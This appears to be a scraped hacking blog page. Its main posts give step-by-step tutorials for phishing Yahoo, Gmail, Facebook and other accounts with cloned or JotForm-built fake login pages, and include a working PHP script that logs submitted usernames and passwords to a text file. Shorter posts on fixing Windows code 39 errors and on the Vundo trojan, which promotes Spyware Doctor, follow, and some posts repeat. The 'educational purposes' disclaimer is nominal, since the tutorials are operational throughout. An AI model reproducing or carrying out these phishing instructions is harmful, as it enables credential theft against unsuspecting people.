In this post I’ll show you to hack yahoo using fake login page to hack yahoo in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.
Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.
Here is a step-by-step procedure to create a fake login page and hack yahoo.
Hack yahoo using fake login page - Procedure
STEP 1.
Go to the Yahoo login page by typing the following URL.
mail.yahoo.com
STEP 2.
Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
To save the page goto File->Save As
Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.
STEP 3.
Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .
STEP 4.
Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML
STEP 5.
Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.
For example you may find something like this in the opened HTML file
src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif”
Rename the above link into
src=”files/ma_mail_1.gif”
Repeat the same procedure for every file contained in the folder by name “files“.
Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.
STEP 6.
Now search for the following term
action=
you will see something like this
action=https://login.yahoo.com/config/login?
Edit this to
action=http://yoursite.com/login.php
Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.
Save the changes to the file.
NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.
STEP 7.
Now you have to upload your yahoo.HTML, files folder and login.php to
yoursite.com Root folder
NOTE: Make sure that your host supports PHP
Tip: 110mb.com supports PHP
STEP 8.
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)
Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password
NOTE: The concept here is to save the password.The format is not important here.
STEP 9.
Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
here is the login script which i am posting due to large number of requst
header("Location: http://WEBSITE ");
$handle =
fopen("pass.txt", "a");
foreach($_GET as
$variable => $value) {
fwrite($handle,
$variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle,
"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
I have found one more working script if you have problem with this script try below one.
Download login script
Friday, January 8, 2010
How to create fake login page for any website?
A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.
In my last post hack yahoo using fake login page i showed you to create fake login page of yahoo..
But i was asked by many others that what about other sites, HOw would i create fake login page for other sites such as orkut,facebook,myspace,gmail and etc
So in this post i will show method to create Fake login page for desired site:
How to create fake login page
Now it's easy to build a Fake Login Pages without any knowledge of Programming Languages. One can use http://www.jotform.com to build the Sign Up page.
{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.
NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.
I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
Now you can access you file on the net by just typing the url of the file.
And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.
Thats how you can create fake login page for your desired site,hope you enjoyed the post
Warning:Hacking is a Crime this post is for educational purposes
In my last post hack yahoo using fake login page i showed you to create fake login page of yahoo..
But i was asked by many others that what about other sites, HOw would i create fake login page for other sites such as orkut,facebook,myspace,gmail and etc
So in this post i will show method to create Fake login page for desired site:
How to create fake login page
Now it's easy to build a Fake Login Pages without any knowledge of Programming Languages. One can use http://www.jotform.com to build the Sign Up page.
{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.
NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.
I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
Now you can access you file on the net by just typing the url of the file.
And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.
Thats how you can create fake login page for your desired site,hope you enjoyed the post
Warning:Hacking is a Crime this post is for educational purposes
Fix Windows Code 39 Errors in 10 Seconds
A code 39 error in windows xp and 2000 usually refers to the PC not being able to run a device properly. This can be the result of many reasons including major crashes, payware, corrupted drivers, updating your devices with improper drivers or corrupted drivers, etc. Regardless of this, you need to fix code 39 errors for all your devices or your PC performance will suffer... A LOT. If you are a gamer, you will see a dramatic drop in your FPS (frames per second), slow load times, or overheating etc. Either the device does not work at all or it will work but not function correctly and cause permanent hardware damage if left unfixed. Here is a quick way to fix code 39 errors if you do not have a backup cd, or restore cd or you can not get your manufacturer's official drivers at the moment.
Go to device manager by right clicking on your "my computer" icon.
Go to properties.
Go to device manager.
Find the device with the small yellow flag (error code 39) next to the devices. Now right click on it and go to properties.
Go to the drivers tab.
Now press the "Roll back Driver" button.
Windows will use the last properly working driver for the device. The flag will be gone and the device should work properly now. A word of warning, this is only a temporary fix in my opinion. You should go the manufacturers site of the device and update the device with official drivers or obtain the recovery CD.
Go to device manager by right clicking on your "my computer" icon.
Go to properties.
Go to device manager.
Find the device with the small yellow flag (error code 39) next to the devices. Now right click on it and go to properties.
Go to the drivers tab.
Now press the "Roll back Driver" button.
Windows will use the last properly working driver for the device. The flag will be gone and the device should work properly now. A word of warning, this is only a temporary fix in my opinion. You should go the manufacturers site of the device and update the device with official drivers or obtain the recovery CD.
Vundo Virus - Is it a Threat?
The Vundo Virus has been around for a while now on the internet and it shows no signs of stopping its control of the new age airwaves on the web. It is definitely a threat to your computer and important files due to the fact that it will make sure that your browser pops up a large amount of ads and other things that will damage your computer if clicked on.
So What is the Vundo Trojan Virus?
It is a very small piece of code that can be downloaded to your computer that usually is unknown to you when you click on a bad link or when you download an email attachment or media file. After this type of Trojan virus is installed, it will start creating connections behind the scenes on your computer to allow your important information to flow out of your computer through the internet. You must install this type of file in order for it to work as it is an .exe, but usually you won't know when this happens. Possible Repercussions of this type of threat include:
Hijacked Browsers
Numerous pop up ads
Stolen email accounts
Deleted files
Very slow computing times
Eventual complete system failure
What should I do to Remove the Vundo Virus?
For most doing a manual removal is out of the question as these types of infections require a good deal of system knowledge that only a very tech orientated person would possess. It seems that you wouldn't be reading this if you had that knowledge anyway. The best way to remove the vundo virus and also to keep all future viruses, Trojans, keyloggers, or spyware off of your computer is to have an active monitoring spyware and virus removal program. We Recommend Spyware Doctor as it has proven to remove every form of vundo that we have tested thus far. It offers great protection as well as total ease of use for the customer, and it has anti-virus feature as well as malware and spyware protection.
To get more information on Vundo Removal, please visit the link. Also here is a Spyware Doctor Review that shows all the features of the program.
Hi, my name is Jake and I have been working in the IT department of a small business for a few years now. Viruses are a threat for any type of business that depends on computers, and nowadays every business must improve their technical savvy or they will fail. I have had to battle viruses like vundo, zlob, virutmonde, and smitfraud on a daily for a few years and have found them very hard to combat without a few bits of knowledge and some good software. I hope to help people fix their computers quickly and easily so they can get back to work and stop worrying about computer problems.
So What is the Vundo Trojan Virus?
It is a very small piece of code that can be downloaded to your computer that usually is unknown to you when you click on a bad link or when you download an email attachment or media file. After this type of Trojan virus is installed, it will start creating connections behind the scenes on your computer to allow your important information to flow out of your computer through the internet. You must install this type of file in order for it to work as it is an .exe, but usually you won't know when this happens. Possible Repercussions of this type of threat include:
Hijacked Browsers
Numerous pop up ads
Stolen email accounts
Deleted files
Very slow computing times
Eventual complete system failure
What should I do to Remove the Vundo Virus?
For most doing a manual removal is out of the question as these types of infections require a good deal of system knowledge that only a very tech orientated person would possess. It seems that you wouldn't be reading this if you had that knowledge anyway. The best way to remove the vundo virus and also to keep all future viruses, Trojans, keyloggers, or spyware off of your computer is to have an active monitoring spyware and virus removal program. We Recommend Spyware Doctor as it has proven to remove every form of vundo that we have tested thus far. It offers great protection as well as total ease of use for the customer, and it has anti-virus feature as well as malware and spyware protection.
To get more information on Vundo Removal, please visit the link. Also here is a Spyware Doctor Review that shows all the features of the program.
Hi, my name is Jake and I have been working in the IT department of a small business for a few years now. Viruses are a threat for any type of business that depends on computers, and nowadays every business must improve their technical savvy or they will fail. I have had to battle viruses like vundo, zlob, virutmonde, and smitfraud on a daily for a few years and have found them very hard to combat without a few bits of knowledge and some good software. I hope to help people fix their computers quickly and easily so they can get back to work and stop worrying about computer problems.
Subscribe to:
Posts (Atom)